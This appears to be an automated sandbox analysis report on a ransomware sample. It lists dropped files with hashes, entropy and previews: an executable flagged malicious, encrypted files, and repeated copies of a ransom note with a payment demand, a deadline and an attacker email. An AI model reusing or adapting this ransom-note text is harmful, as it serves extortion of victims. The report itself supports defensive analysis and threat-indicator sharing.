                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):917440
                                                                                            Entropy (8bit):6.642673459672795
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:TBaDVJPdx2bm2Fz91FfjkSsM9D/fgSohh3UFZ:cN4xoQDngS8kFZ
                                                                                            MD5:616EDCD99B6C4FE02E25D31AE57C087C
                                                                                            SHA1:82D550415A2EC57A14927387174846086B81931E
                                                                                            SHA-256:9086444FAC123B75FDFD1E8B85B436A0F7F31E4EE97A92ED43CC46B5AE3E2975
                                                                                            SHA-512:AD527FDE7F96E39CA9516D686276966B9A90084BB17B14CA486A942977FE5D0B91E9EAB882F1E5A2AC3174CCC82DA97874767F9D736D1680485E8562338C130E
                                                                                            Malicious:true
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YY...8...8...8..FP...8..FP..8..FP...8..OM...8..OM...8..OM..B8...M..48..FP...8..FP...8...8..8...M...8...M-..8...8E..8...M...8..Rich.8..........PE..L....Jg....................."......<.............@.......................................@..................................[...........q...............U...p..... q..p....................r.......q..@...............,............................text............................... ..`.rdata.............................@..@.data........p...^...R..............@....rsrc....q.......r..................@..@.reloc......p......."..............@..B........................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.148503884380041
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:A/XCNSBP+FX6QM/iCaGNIm1h0WIVEkm5QWP4RV2ELAxh3brgt/YmzN+t3rMk50n:AFAKVKCaGNIm1hJIe5FPGV2ELAX/gCmR
                                                                                            MD5:F81ADA91CEE037B31541F1BD1F069E55
                                                                                            SHA1:3AA9806D6CC6A7B2B965CA6D765B8C0C1D60ADE0
                                                                                            SHA-256:1D80109E3F37F226B080F62A9BD77DB958A0018AAF9A83F4C2307C52C6757A8D
                                                                                            SHA-512:D9DEA887126CFDEC235AE0D46D3C1A12C12E15A7686BE886EB27C93AA14F6B01D369C4C99FEC301B8AEA404545638759562AE1B5101078165BC59C0B210019FA
                                                                                            Malicious:false
                                                                                            Preview:".yP...C..g.j.x...........Av.N.....}..\S..)9.3 ."6~.[.,.h....`o.z)d.&.'..b?.=...Qp.7v...BUN...."N#..'.......YA.p.|K<...0_..A..tB..6..h..`...J'..)........5a5e.ygjp.......|.J|..)B.A..)_CE8.....1.v.,....@..~%....6...`....P9...x.o..I..{...}.?j%..Wh!{.4.,c.>.<0....fdQ.c.v.k...q.....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):288
                                                                                            Entropy (8bit):7.249873623015729
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:wcTNSsf0diKQ8CWUIEWJA4Ueejj2eMaATSA//bSn:wKSsf8wdWd1yj24ATr/bSn
                                                                                            MD5:0FCBFEB07DB23483E8D0AACCEE9326E3
                                                                                            SHA1:06C2E33BB5389B1BDDBCDB454295F2C891A6235F
                                                                                            SHA-256:6DC4C19A27AF55DE6F59376C93BE5CDA7519EDCEFFD227A47F45732982779948
                                                                                            SHA-512:8EAA28A4DB4611AE6BF781D1F8A482226460C8AFC5B9F906C8CBFC097E6D0C39C06831880AD3186BDC702FBE52BEEBDBF6CA7FFEF0EAAADF9B28E02DB4DECED2
                                                                                            Malicious:false
                                                                                            Preview:.95..A.$f.A..C.>>].>>6ELW2+...B.p.+..yX.Rmr.`..7Z..DX.....b.gJ..v.... .'1WZ.....6......._.G.........s..~*......y.2...c.V.9}..:.q...0./66E.{...`.Hx\..m....T.?R.+H"...t...;.....<..{.fKKRW...M..'<....Fm.v...P.#..o..yt..r. .B/..!xPc...._.....J......A7...nR`..x.q.I..-m.D..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):290
                                                                                            Entropy (8bit):7.30421080375445
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:nBWa0IqRGLOEeOgcj61tfcC2C5cZWofJh5wfOOk11euZeIGGawn:nBW9I1DeOTaKpZWMJh5wfY11hcILn
                                                                                            MD5:6F223E05A1D20E986EDBB2A7CD528D6C
                                                                                            SHA1:64350798007413A5DB095B753D4217838284AD2F
                                                                                            SHA-256:35893756B2994C13E2D16D762992668D149E7910F9B11F67DE97E6DCF19D519C
                                                                                            SHA-512:8BB35E81F5012D7EA67EC5483EDEFBFE15925129D762F8776DAFF45B0DEE97008965D6DE56B3A1DE8C2E9C3B5BC53D998386F0A816429FAF9EE82D1A75F924EA
                                                                                            Malicious:false
                                                                                            Preview:...............<<>>].>>C...F.X...z.~1.G.m.E.(.:...Q/..j%1...G...l5la.Z..;...EI..+B..v..=V.94).....!........."l..s...J.../O...`t..:Fj..n.?....G.>...ix......>....C.=.....*8..0n?y...4....%(. .....W.c.U.[.S..~..oW.}..s9.e.U.,Wk.OV.A..1,m.a.dc.B.M....yzq.E m...D._w...2...T..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):67070
                                                                                            Entropy (8bit):6.566798530810723
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:SC8Lf1WMFHmw8XJZZZe/E4XdNSirWriXYWZZMZ/dYS8VLm+kig+GPG6rD2keZ:e7kumw8Zd5rYZGZutbzf0xc
                                                                                            MD5:5629699B0C80D57839271C2D28DF0B81
                                                                                            SHA1:78BDF809842235B333AF762A4A378687DF895F9D
                                                                                            SHA-256:CC734F91933F3082615E1C7DA9C943CDD2E9F579F0C2796693895C327EC66904
                                                                                            SHA-512:D289918DCB7DB923465B0484A31EE34E018C349231E904A917F1EB805377B9223D36AD2427231715CE7B8A9525ED4A6725D944B3A3DEDC15120E7A668BE92FE3
                                                                                            Malicious:false
                                                                                            Preview:B..|..W|.m.r..M..S..y.....z....t..J..M. .$......-+.L...Pa...f5.2.B.nSKJ.T.j,.vU.V.2...T......u.7...(..).........Cw)...b.$.....vdb[uvs..Z.e....s5)..nF:..\W3c.Vm.z:....H.HNw/}R..O..D.v.....9v..4..[2...H.....k.|6,4..E..w..{...x.|*../.=w.Q.y..2....x...*......lM.7..I.s..Z.9...Yw0..2.0Yd..........[F.T`.*....D.j,n...q...4.?$..}.....Bi.....n.i.7.].a.(w.f...4....MIg...BXe..e)_h!.".~..o>..(W..&...U....S;.b5..!.K.vK..5..cM...@H.X...P.{P.G.Ms0.]p....q...5.{H.0.r.y...8.......l}..!.Vk......?A..!.s..j......+{%n..f..hj...s.R..Vu... ..8.K|.nM.._..........6/.u..3...a...LD...f...]x.Ax.]}../..<......|.d.d.G.w}G.. .0c........2u.?vh...o....cc$}..t.*.T.Y.1...3.<..C.(.>VQ.`....gQ>.....9.`.. T...7.rM#L..J....U.'...HW4..7\..$..z.M..:.....%......M."~u.."..}.;..R.xl..0g...na[>.Q..6....k.....x..P......T.z..v..`5.RO.....A.).W.Zru....gP.#..Po....3w\...nFX.B.Z.~`<.(.2.{..F...5...M8L..z.F._f...!...U..F'vz.i.JqM..v..^..sXb.}.?Z8.x.....^p.I...d....F...i".Urh....X...Z...a....&..'..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1003
                                                                                            Entropy (8bit):7.7657844801163405
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:z7XgYg7CRj4+L+0iD3HcfemdDNkhNeme29+WQ5c:z7QnCOREJrWyc
                                                                                            MD5:E835CDD5957BEFDE908F13536391D1E3
                                                                                            SHA1:016469A75C3C8E56762A87F8E55ABF453D1FC30C
                                                                                            SHA-256:853FA1E2413F9C15B6605A9443F6D817B6C26083A7E1AD313631D5B6E7FAC212
                                                                                            SHA-512:49D04FE047DD82578A6CF5AA4D220FCA01C4A535A6325537FC4BF25A182773CF1EF8F32CBA01A0D936310D0BA93EC92D42A68C28BB44E9B2EE487E8B342453E5
                                                                                            Malicious:false
                                                                                            Preview:F...n<..p...-.W.H..........O.D,h...p.(h...i.o....x.'V. ..n.....r7.y...".-..H..V.a..A?...=._.d[...d`..l....5....~...#..~...Z.._k..Oz..ya.....V.h...........N...+..Q...[.?....:K.......`Wel..@.........(|.>...v.m%._...0..\k.6.C..y....d[y.rb....i.j._....K.....k......c.....R....`$s5.hG.+w..............OA0g...:......p...gw.h.<.,..l..`.2...........k(.......i.G._..>.K.C...?tq.!...-..<..FV.Q|..5..t?..../..G.Y}y....._.a.'_.N;.....$...+R..:?.[.....'EB#.6q.W...`G..+d~..h.?..N.....a..O...8....c.t...y.w.&.T.kO.N9...X...3.'....K.:K..........a..%.....-Q9.e(n&..80Y..t..Nc..\......>4...u..mGyej...@|N....0..;]A6.+....hQA%..X/..Hv....8.......:......F..mb..o8......7/.......z..<e]............&..vz.H..j...Dd..a4v...f.....(aQ;..+........W....).d.....s....=.Z3....:.......J.y..X.7.$ D....8......XbC...E(/.:..Iq..g....c..zs.-C.....hBXD.|.NH..i...Hj'...I..g+.n..=......cKXf)..*....j..p.BS.l...V...;...f}?.)@O...#ep.2.f....y....f.h..;..K>b6......4>..F...3......,C.C.h13l0xABADC
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):10506
                                                                                            Entropy (8bit):4.266656938193457
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:dI8Eu42VJD8RNLY1NpnR0UYWQIkr+mwYT4Qx53aqPj2CjAP9s7:dhXpWxY1NbGVyVQbaqP5jAO7
                                                                                            MD5:CD4833423D5FE613B9458396ACDA67D2
                                                                                            SHA1:DCD464951732FAD29567CF9B894404F53929BB23
                                                                                            SHA-256:4824716D1ACE6B3F1B11C9D623F3341AEC681D5A646CE14AE030A0628F6E6A28
                                                                                            SHA-512:111D7FCE4C71512B1F8A2D0ABA7A84C437AFC3E29C824C390BEDD4B1E1C682C7CDC544BD1987D41BAE9249E1D6BA61C3D13E9EC969FBB23D1FA70D6423B48C24
                                                                                            Malicious:false
                                                                                            Preview:.|.L.....nh......S..)...W....!..!..|..wv.W.......3...@..ok(1...}...^..}...G#.?.,...W:...V..V..h......f..t.4.......f..=....".W....`.Q.Q........./.&..0..s%..?....f........~.U..U+{.i.3D;P%...-m......9.tS.<.:v.....HV..*$..(..?.t^h......p49tZ.>.JDz.m.'.z...jB!..X....P..T.q..I..../.....g..N.("'D-....'.@w....0.I.......*r?A...=-h...op]....4.Q. .....K..g.%.5^..u;.0i....{.nez.DP!.z..%...n\..*.8.......u.t.....C..&1...=....B.5.....G.X\.....@;...t......1O."...V..cE..........]..~yY...K....\...}.\/.r.......x.....%...........m.B.l8e..r.5+.L....!|..D.*....P..r....4C.o.d.H.q..`...@...K/....>.5..Y,.-.S....U.O..Ex..9.m...).....w.P7..F.....:.,.I...*.5s..e..9!%...).?2./.........M.?......9.,#..~.N...J....B5.......g./...k"JK.C.&.f....>.rL7..rE.J.....|z...*.b......k-..a...N..V(.sQs......9.V"..KY.......^U.CM..}..l....,...!...ZNJy.k......hB0C.RI;#.T.....<m....5.Xs....+...RS..r...j....0.JYJ..Q~...|=A....H........]C..{O.6...B....MmWM.K.j..........:,..|."..*.&....kD..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):24418
                                                                                            Entropy (8bit):2.3637194372000305
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:EMM6fTzsSA+7QHIVwL7hbviFXXOCzE5OyN:E6z2HIVo7l4XVzuN
                                                                                            MD5:F171AB2FEF22FED8C048D7C5D21CFE7B
                                                                                            SHA1:1C2994BE2199A7F93546429DEE5BD0194A19C81F
                                                                                            SHA-256:54904F65185276E07BA8F5E1C77B83FD64518180F3CCE060316DB84885624730
                                                                                            SHA-512:F5F0E99476D87980A3D274A26DCE0C8A884BECA4C2996CCD8739E57870B173F468266B4DC83E2B18A57F140A483599F5D21B14AF5171D494D71E9243C7806E78
                                                                                            Malicious:false
                                                                                            Preview:13... ..hr..7.wrw...!......>...Z.q...1....O/..@..iZ-@.!.K...Bi.jm~U7h..]. k..&O.)T..T>P.{n.1.I...a.].WR:....p...S.B..../...y....Y.`.......oT..5o.h..T...X.|c^..~...2ZsV%.../.......c....J..4.7.r._..z^\..P1R$Nu..l.!.V..8{.w.;.'C..C.9.<.tE.e.%.`...i...u.-z......A......4Oqb.\..k..9.z.M..s.../.K@~...3_.B......r....N04.=&..T..5....Xc..Z...X.].R...&..[.Q.....$_?l...\*B....Q ..v....k.....(..,.s....Z$.....El..Yy!.....t.D.>.;9.W...,.l...5@...B..t....P...4.g.0.....r.......=..uV.;.F...\..2....a.!d(....3Qb.m.....;.......v.*...4.@.|...%{.J5...Y&g....~..P.`L. ........K.o.vp/.....-..l...D.YZu.*.lvM.T_'..`..~.<R...@..?.7.CR.B^N...N.(6.......9...}..x/Rt.t.*..;..mY,.]...3.`.^.<.a..y.Mse.m...x....s.q..x..<M..(.(...6......^..U.".L...(..a.X.."-3..P.<7...Zi5....!..."...8R!j.....z.:).x?D..s.pjLW...#.:....7.5.C..{........x.r.M.v...c.D:@.._~$Etd....-(....D....l...t....q..v......B.....)......(CN\.j.......*.-V.KW...M..u'.fx.re}...E.Z...A4uMt....l.F5}XK>P.4!..Fti&z
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):530
                                                                                            Entropy (8bit):7.608426382069746
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:wmR5v9mgGgtrH2bDIw6RMd25t2SJnEJvh58yoFcisW+G1FDOp5omGwn:wmzv9dGgtrH24w6Kd25t2SJngh51oXuf
                                                                                            MD5:7032F6E3765F4B5A0243A0BE49F2BCE1
                                                                                            SHA1:18A6BED9DE45C3CC1E064E963F856BAD425295A8
                                                                                            SHA-256:27A1336167EADEAB6E376A47D8EA72445C7A1BC69E7761F612E5E12F5C4B2232
                                                                                            SHA-512:F3B0FCEC031F155B0FAFE9190F2075BC73AC28CDCBEE9F630F16068E359C20B34E930A9AA615C22338728C4A8AA960D765783EE40DE2504B160E82DB560C6841
                                                                                            Malicious:false
